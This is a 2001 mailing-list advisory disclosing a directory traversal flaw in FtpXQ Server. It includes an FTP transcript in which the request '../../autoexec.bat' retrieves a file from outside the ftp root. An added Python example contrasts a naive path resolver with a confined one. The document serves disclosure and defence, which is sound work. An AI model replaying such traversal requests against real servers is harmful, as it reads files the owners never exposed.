Date: Wed, 28 Feb 2001 18:32:19 -0500
From: [email protected]
To: [email protected]
Subject: Vulnerability in FtpXQ Server
Vulnerability in FtpXQ Server
Overview
FtpXQ Server 2.0.93 is an ftp server available from
http://www.datawizard.net and http://www.download.com. A vulnerability
exists which allows an attacker to download files outside the ftp root.
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> pwd
257 Remote directory is "/directory/directory/"
ftp> cd ..
550 Requested file action not taken---user does not have access.
ftp> get ../../autoexec.bat
200 OK
150 Opening data connection.
226 Transfer completed.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp>
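The transcript shows a request of "../../autoexec.bat" being served from above the ftp root. What follows is an added example, not part of the advisory and not the vendor's code: a Python model of the path handling the transcript implies (join the request onto the directory, let the OS collapse ".." and never compare the result with the root), beside a confined resolver a server could use instead. The root c:\directory\directory is the one from the transcript, used here as a constructed test value; the names naive_resolve, is_within_root and confined_resolve are my own.

```python
import ntpath
from typing import List, Optional

# Constructed to match the advisory's transcript; not taken from the server.
FTP_ROOT = r"c:\directory\directory"


def naive_resolve(root: str, requested: str) -> str:
    """Model of the flawed behaviour the transcript shows: join the client's
    path onto the current directory and let normpath collapse '..', with no
    check that the result is still under the ftp root."""
    return ntpath.normpath(ntpath.join(root, requested))


def is_within_root(root: str, real_path: str) -> bool:
    """True if real_path is the root itself or lies beneath it.

    Uses commonpath (component-wise, case-insensitive as on Windows) rather
    than a string prefix test, so 'c:\\dir2' is not mistaken for a child of
    'c:\\dir'. A different drive or a relative path raises ValueError in
    commonpath and is treated as outside the root."""
    root_n = ntpath.normcase(ntpath.normpath(root))
    path_n = ntpath.normcase(ntpath.normpath(real_path))
    try:
        return ntpath.commonpath([root_n, path_n]) == root_n
    except ValueError:
        return False


def confined_resolve(root: str, cwd: str, requested: str) -> Optional[str]:
    """Map a client-supplied path onto the filesystem, confined to root.

    cwd is the client's directory in the virtual tree, where '/' is the ftp
    root (the server should never expose the real path, as the transcript's
    PWD reply does). Returns the real path, or None when the request tries
    to rise above the root; refusing instead of silently clamping lets the
    server log the attempt."""
    raw = requested.replace("\\", "/")           # clients send either separator
    if not raw.startswith("/"):
        raw = cwd.replace("\\", "/").rstrip("/") + "/" + raw
    parts: List[str] = []
    for seg in raw.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                        # would leave the virtual root
                return None
            parts.pop()
        else:
            parts.append(seg)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the virtual walk above already prevents escape, but
    # a component such as 'd:file' can still switch drives inside ntpath.join,
    # so re-check the real path against the root before touching the disk.
    return real if is_within_root(root, real) else None


if __name__ == "__main__":
    print("naive   :", naive_resolve(FTP_ROOT, "../../autoexec.bat"))
    print("confined:", confined_resolve(FTP_ROOT, "/", "../../autoexec.bat"))
```

Running the block shows the naive resolver returning c:\autoexec.bat for the transcript's request while the confined resolver returns None. The refusal-plus-commonpath pair is the property to look for when reviewing any file-serving code: normalising the path is not a check, and a string prefix comparison against the root is not one either.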
Solution
No quick fix is possible.
Vendor Status
DataWizard Technologies, Inc. was contacted via <[email protected]>
on Tuesday, February 20, 2001. No reply was received.
- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )